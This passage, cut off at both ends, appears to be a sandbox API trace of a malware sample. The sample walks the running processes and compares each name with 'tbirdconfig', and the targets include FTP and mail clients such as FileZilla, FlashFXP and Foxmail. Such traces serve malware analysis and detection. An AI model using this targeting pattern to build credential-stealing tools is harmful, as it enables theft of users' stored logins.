cchWideChar=-1, lpMultiByteStr=0x356ada8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0095.270] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0095.270] StrStrIA (lpFirst="references compounds.exe", lpSrch="tbirdconfig") returned 0x0 [0095.271] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0095.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.272] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35745c8 [0095.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x35745c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0095.272] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0095.272] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="tbirdconfig") returned 0x0 [0095.272] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0095.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.273] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3574468 [0095.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3574468, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0095.273] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0095.273] StrStrIA (lpFirst="registered try.exe", lpSrch="tbirdconfig") returned 0x0 [0095.273] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0095.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0095.275] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356adf8 [0095.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356adf8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0095.275] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0095.275] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="tbirdconfig") returned 0x0 [0095.275] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0095.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.276] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3572bd0 [0095.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3572bd0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0095.276] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0095.276] StrStrIA (lpFirst="invite.exe", lpSrch="tbirdconfig") returned 0x0 [0095.276] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0095.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.277] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3572d38 [0095.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3572d38, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0095.277] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0095.277] StrStrIA (lpFirst="idol.exe", lpSrch="tbirdconfig") returned 0x0 [0095.278] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0095.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0095.279] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356add0 [0095.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356add0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0095.279] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0095.279] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="tbirdconfig") returned 0x0 [0095.279] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0095.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0095.280] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356a9e8 [0095.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356a9e8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0095.280] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0095.281] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="tbirdconfig") returned 0x0 [0095.281] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0095.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.282] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3572c48 [0095.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3572c48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0095.282] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0095.282] StrStrIA (lpFirst="powell_jane.exe", lpSrch="tbirdconfig") returned 0x0 [0095.282] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0095.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.283] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35745e8 [0095.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x35745e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0095.283] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0095.283] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="tbirdconfig") returned 0x0 [0095.283] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0095.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.285] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3572b10 [0095.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3572b10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0095.285] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0095.285] StrStrIA (lpFirst="gainedshape.exe", lpSrch="tbirdconfig") returned 0x0 [0095.285] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0095.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.286] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3574488 [0095.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x3574488, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0095.286] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0095.286] StrStrIA (lpFirst="opens-versions.exe", lpSrch="tbirdconfig") returned 0x0 [0095.287] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0095.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0095.288] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356ac18 [0095.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356ac18, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0095.288] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0095.288] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="tbirdconfig") returned 0x0 [0095.288] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0095.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.289] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572ab0 [0095.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3572ab0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0095.290] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0095.290] StrStrIA (lpFirst="3dftp.exe", lpSrch="tbirdconfig") returned 0x0 [0095.290] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0095.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.291] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3574628 [0095.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3574628, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0095.291] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0095.291] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="tbirdconfig") returned 0x0 [0095.291] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0095.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.292] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572ac8 [0095.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3572ac8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0095.292] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0095.293] StrStrIA (lpFirst="alftp.exe", lpSrch="tbirdconfig") returned 0x0 [0095.293] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0095.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.300] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572c78 [0095.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3572c78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0095.300] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0095.300] StrStrIA (lpFirst="barca.exe", lpSrch="tbirdconfig") returned 0x0 [0095.300] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0095.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.302] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572b28 [0095.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3572b28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0095.302] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0095.302] StrStrIA (lpFirst="bitkinex.exe", lpSrch="tbirdconfig") returned 0x0 [0095.302] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0095.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.303] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572b58 [0095.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3572b58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0095.303] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0095.303] StrStrIA (lpFirst="coreftp.exe", lpSrch="tbirdconfig") returned 0x0 [0095.303] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0095.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0095.304] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35372f8 [0095.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x35372f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0095.304] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0095.305] StrStrIA (lpFirst="far.exe", lpSrch="tbirdconfig") returned 0x0 [0095.305] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0095.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.306] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3572d50 [0095.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3572d50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0095.306] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0095.306] StrStrIA (lpFirst="filezilla.exe", lpSrch="tbirdconfig") returned 0x0 [0095.306] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0095.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.307] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572c18 [0095.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3572c18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.307] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0095.307] StrStrIA (lpFirst="flashfxp.exe", lpSrch="tbirdconfig") returned 0x0 [0095.307] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0095.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.309] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572c30 [0095.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3572c30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0095.309] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0095.309] StrStrIA (lpFirst="fling.exe", lpSrch="tbirdconfig") returned 0x0 [0095.309] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0095.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", 